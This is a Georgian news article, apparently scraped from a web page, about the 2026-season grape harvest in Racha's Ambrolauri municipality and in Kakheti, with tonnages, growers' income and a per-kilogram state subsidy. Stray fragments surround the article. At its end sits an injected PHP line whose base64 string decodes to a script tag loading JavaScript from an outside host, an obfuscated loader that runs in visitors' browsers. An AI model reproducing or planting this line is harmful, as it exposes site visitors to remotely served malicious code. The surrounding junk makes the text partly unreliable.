celsiusi
ავერსი შნაიდერი
რაჭის რეგიონში რთველი აქტიურად მიმდინარეობს. 13 ოქტომბრის მონაცემებით, ამბროლაურის მუნიციპალიტეტში, გადამუშავებულია 800 ტონა ალექსანდროულისა და მუჯურეთულის ჯიშის ყურძენი. ღვინის საწარმოებს ყურძენი 900-მდე მევენახემ ჩააბარა და მიღებულმა შემოსავალმა 5,5 მლნ ლარს მიაღწია. ამის შესახებ საინფორმაციო სააგენტო BUSINESS TIME-ს ღვინის ეროვნული სააგენტოდან აცნობეს. 
 
მიმდინარე წელს, ამბროლაურში, რთველის საკოორდინაციო შტაბში დარეგისტრირდა 40-მდე კერძო კომპანია, რომლებიც ყურძენს ადგილობრივი მოსახლეობისგან შეიძენენ.
 
ამ ეტაპზე, ამბროლაურის მუნიციპალიტეტში, სხვადასხვა ლოკაციაზე, ყურძნის ჩასაბარებელი 30-მდე პუნქტია გახსნილი, რაც მოსახლეობას მოსავლის
შეუფერხებელი დაბინავების შესაძლებლობას აძლევს. ყურძნის მოსავლის სრულად დაბინავების, რთველის პროცესში კერძო საწარმოების აქტიური ჩართულობისა და სტიმულირების მიზნით, საქართველოს მთავრობის გადაწყვეტილებით, სუბსიდირების პროგრამა რაჭის რეგიონშიც ხორციელდება. სუბსიდიას მიიღებს ყველა ის კომპანია, რომელიც შეიძენს და გადაამუშავებს ხვანჭკარას მიკროზონაში მოწეულ არანაკლებ 3 ტონა ალექსანდროულისა და მუჯურეთულის ჯიშის ყურძენს და მევენახეს გადაუხდის არანაკლებ 7 ლარს. აღნიშნული კომპანიები, სახელმწიფო სუბსიდიის სახით, 1 კგ ალექსანდროულსა და 1 კგ მუჯურეთულზე 4 ლარს მიიღებენ.
 
უნდა აღინიშნოს, რომ რთველი დასასრულს უახლოვდება კახეთის რეგიონში. ამ დროისთვის, კახეთში გადამუშავებულია 240 ათასამდე ტონა ყურძენი. მოსავალი უკვე დააბინავა 21 ათასამდე მევენახემ, რომელთა შემოსავალი 240 მლნ ლარს აღწევს.
 
 
431
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");